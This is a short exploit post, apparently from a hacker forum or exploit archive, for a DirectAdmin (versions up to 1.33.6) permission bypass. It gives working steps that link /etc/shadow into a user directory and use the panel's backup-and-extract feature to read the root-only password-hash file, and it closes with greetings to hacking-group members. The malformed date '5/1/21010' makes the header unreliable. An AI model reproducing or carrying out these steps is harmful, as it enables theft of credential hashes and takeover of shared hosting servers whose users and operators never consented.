22 lines
No EOL
920 B
Text
22 lines
No EOL
920 B
Text
Subject: DirectAdmin <= 1.33.6 Symlink Permission Bypass
|
|
Date: 5/1/21010
|
|
Author: alnjm33
|
|
Tested on: 1.33.6 -- 1.33.1 and i think it's work in all versions
|
|
Home:sec-war.com
|
|
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::exploit::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|
first
|
|
must execute this command on the server >>>> ln /etc/shadow
|
|
to make symbolic link to shadow file in any dir
|
|
after that go to
|
|
Create/Restore Backups in direct and make
|
|
((Domains Directory: Backs up))
|
|
the backup file will be in
|
|
/home/test/backups
|
|
go there then Extract tar.gz file
|
|
after extract
|
|
go to
|
|
/home/test/backups/domains/test.com/public_html
|
|
or the dir which you execute the command
|
|
and now you can read the shadow file which have 400 Permission
|
|
|
|
Greetz to :PrEdAtOr -Sh0ot3R - xXx - Mu$L!m-h4ck3r - ahmadso -JaMbA-RoOt_EgY-jago-dz-XR57 all sec-war.com members<http://sec-war.com/cc//index.php?showuser=36> |